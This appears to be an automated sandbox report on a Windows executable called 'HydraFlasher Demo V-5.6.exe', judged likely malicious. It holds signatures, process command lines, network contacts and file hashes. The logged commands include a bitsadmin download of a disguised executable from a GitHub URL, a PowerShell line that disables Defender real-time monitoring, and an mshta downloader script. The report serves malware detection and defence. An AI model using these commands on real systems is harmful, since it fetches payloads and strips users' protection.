Analysis Overview
SHA256
536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0
Threat Level: Likely malicious
The file HydraFlasher Demo V-5.6.exe was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
.NET Reactor protector
Checks computer location settings
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Modifies registry class
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 18:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 18:59
Reported
2024-07-28 19:02
Platform
win10v2004-20240709-en
Max time kernel
50s
Max time network
104s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| N/A | N/A | C:\Users\Admin\HydraFlasher Demo.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\HydraFlasher Demo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe
"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe
"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Users\Admin\HydraFlasher Demo.exe
"C:\Users\Admin\HydraFlasher Demo.exe"
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/sleeper-cell/security/releases/download/dllhost/xvchosts.exe C:\Users\Admin\AppData\Roaming\notepad.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.blockchain.com/btc/address/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd61646f8,0x7ffdd6164708,0x7ffdd6164718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.blockchain.com | udp |
| US | 104.17.11.85:443 | www.blockchain.com | tcp |
| US | 104.17.11.85:443 | www.blockchain.com | tcp |
| US | 8.8.8.8:53 | ssl.google-analytics.com | udp |
| US | 8.8.8.8:53 | coinzillatag.com | udp |
| US | 104.21.69.73:443 | coinzillatag.com | tcp |
| US | 8.8.8.8:53 | 85.11.17.104.in-addr.arpa | udp |
| FR | 172.217.18.200:443 | ssl.google-analytics.com | tcp |
| US | 104.21.69.73:443 | coinzillatag.com | tcp |
| FR | 172.217.18.200:443 | ssl.google-analytics.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe
| MD5 | 154e7c4941e5c99f6fe369ff90dc8370 |
| SHA1 | d155c4fcccc60ae26291fd1177780b3591ccbb49 |
| SHA256 | ff295bc05708762ae2fc54195c8785708291219e6d07ec52077980049e1f3d24 |
| SHA512 | c37427cae52c78d95829b690113a5dab7c4a859a7d2c8781bd1580c9af24b6a7eb53d0d3bdaf87aa505035f2620e36e5688ea5da90eb7c16203a7bea634c544d |
memory/1952-13-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-12-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-11-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/4728-14-0x0000000000AE0000-0x000000000158A000-memory.dmp
memory/1952-22-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-24-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-23-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-21-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-20-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-19-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-18-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
C:\Users\Admin\HydraFlasher Demo.exe
| MD5 | ac70d7032b72fb148ac74a0b902de461 |
| SHA1 | c3fe932e0e5f672b1dedd5309087f7e7d165c683 |
| SHA256 | a672ed87b2f51e8f549194b1e2bdfcd8b3d3326bc60f2eb8e76ab7f4422a5c63 |
| SHA512 | f840046e0192605aacd9e428bb46fffd53bc39c7f0ce04ccb5ba81df35cee36a6fffc7cbd6ad51e89eea3cbbc3687951a3baf8de662c4068cc026dba62a44b8a |
C:\Users\Admin\Downloader.hta
| MD5 | 2dc6046e1cd218ba1ae101c6a96cb1ea |
| SHA1 | 26f057f84ca50739d3be3bdb022906b296364744 |
| SHA256 | 012954762478b91e47a668255ce82791a4078761b18aaa74fc4e4c7168214cc8 |
| SHA512 | 49f202b82a9561022b5b1299bbb2fcbda7ac89de6b8cfe7d5ba68ba08002b0cdefa93642128c08b217741644245fa2f550581bb4107676a592d615cdcdaa9179 |
memory/4260-58-0x0000000000990000-0x0000000001430000-memory.dmp
memory/4260-59-0x0000000006610000-0x0000000006BB4000-memory.dmp
memory/4260-60-0x0000000005E60000-0x0000000005EF2000-memory.dmp
memory/4260-61-0x0000000005E50000-0x0000000005E5A000-memory.dmp
memory/1564-65-0x0000000002960000-0x0000000002996000-memory.dmp
memory/1564-66-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1564-67-0x00000000052E0000-0x0000000005302000-memory.dmp
memory/1564-68-0x0000000005580000-0x00000000055E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apebtnye.ubp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1564-74-0x0000000005660000-0x00000000056C6000-memory.dmp
memory/1564-79-0x0000000005D20000-0x0000000006074000-memory.dmp
memory/1564-80-0x00000000056D0000-0x00000000056EE000-memory.dmp
memory/1564-81-0x00000000062F0000-0x000000000633C000-memory.dmp
memory/1564-82-0x0000000007460000-0x0000000007492000-memory.dmp
memory/1564-83-0x000000006C4C0000-0x000000006C50C000-memory.dmp
memory/1564-93-0x0000000006880000-0x000000000689E000-memory.dmp
memory/1564-94-0x00000000074A0000-0x0000000007543000-memory.dmp
memory/1564-95-0x0000000007C30000-0x00000000082AA000-memory.dmp
memory/1564-96-0x00000000075F0000-0x000000000760A000-memory.dmp
memory/1564-97-0x0000000007660000-0x000000000766A000-memory.dmp
memory/1564-98-0x0000000007870000-0x0000000007906000-memory.dmp
memory/1564-99-0x00000000077F0000-0x0000000007801000-memory.dmp
memory/1564-100-0x0000000007820000-0x000000000782E000-memory.dmp
memory/1564-101-0x0000000007830000-0x0000000007844000-memory.dmp
memory/1564-102-0x0000000007930000-0x000000000794A000-memory.dmp
memory/1564-103-0x0000000007910000-0x0000000007918000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 54aadd2d8ec66e446f1edb466b99ba8d |
| SHA1 | a94f02b035dc918d8d9a46e6886413f15be5bff0 |
| SHA256 | 1971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e |
| SHA512 | 7e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994 |
\??\pipe\LOCAL\crashpad_3532_XUJIWUYPWRVMKRJZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2f842025e22e522658c640cfc7edc529 |
| SHA1 | 4c2b24b02709acdd159f1b9bbeb396e52af27033 |
| SHA256 | 1191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e |
| SHA512 | 6e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b056dc60bb476d9ac65ad76c9c778f45 |
| SHA1 | cd4943b47e697b7c773448580573d6292e7ef1eb |
| SHA256 | 9a06a7cd0edcaf9ad4669bdfc3bf4bac6399f80a22d2cf6884da8e166c02383d |
| SHA512 | 5d4e75dac237f3b1950cfccc48e18cfb4b13a1e553be0160373462a2321160ca2448fbce398a562839a84d86634783ed6e577adaee4d15e1a1b85d7b9d7e985c |